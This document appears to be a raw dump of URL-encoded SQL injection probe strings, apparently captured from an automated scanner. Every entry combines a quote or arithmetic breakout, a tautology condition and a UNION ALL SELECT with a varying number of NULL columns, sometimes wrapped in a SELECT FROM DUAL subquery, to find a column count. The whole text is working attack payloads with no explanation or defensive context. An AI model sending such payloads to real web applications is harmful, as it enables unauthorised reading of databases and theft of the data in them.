1%27%20WHERE%202286%3D2286%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%202783%3D2783%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203914%3D3914%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207144%3D7144%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%201832%3D1832%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%205470%3D5470%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%201085%3D1085%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%204424%3D4424%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203414%3D3414%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208758%3D8758%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%202896%3D2896%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%204029%3D4029%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20%7C%7C%20%28SELECT%203985%20FROM%20DUAL%20WHERE%205499%3D5499%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204602%20FROM%20DUAL%20WHERE%203256%3D3256%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204885%20FROM%20DUAL%20WHERE%205806%3D5806%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203313%20FROM%20DUAL%20WHERE%204041%3D4041%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201457%20FROM%20DUAL%20WHERE%202260%3D2260%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208911%20FROM%20DUAL%20WHERE%205000%3D5000%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203360%20FROM%20DUAL%20WHERE%205241%3D5241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209764%20FROM%20DUAL%20WHERE%207819%3D7819%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201193%20FROM%20DUAL%20WHERE%205177%3D5177%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202296%20FROM%20DUAL%20WHERE%207078%3D7078%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203125%20WHERE%207055%3D7055%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207764%20WHERE%205656%3D5656%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206377%20WHERE%202801%3D2801%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206506%20WHERE%201735%3D1735%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209624%20WHERE%209688%3D9688%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207748%20WHERE%202854%3D2854%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204659%20WHERE%201225%3D1225%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208304%20WHERE%209831%3D9831%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206818%20WHERE%208804%3D8804%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201718%20WHERE%202514%3D2514%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209124%20FROM%20DUAL%20WHERE%202393%3D2393%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%204506%20FROM%20DUAL%20WHERE%202272%3D2272%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206784%20FROM%20DUAL%20WHERE%201369%3D1369%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209774%20FROM%20DUAL%20WHERE%206851%3D6851%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202465%20FROM%20DUAL%20WHERE%202790%3D2790%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205171%20FROM%20DUAL%20WHERE%204131%3D4131%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207268%20FROM%20DUAL%20WHERE%208192%3D8192%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205330%20FROM%20DUAL%20WHERE%209420%3D9420%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209565%20FROM%20DUAL%20WHERE%206198%3D6198%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205764%20FROM%20DUAL%20WHERE%208144%3D8144%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202320%20WHERE%205714%3D5714%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 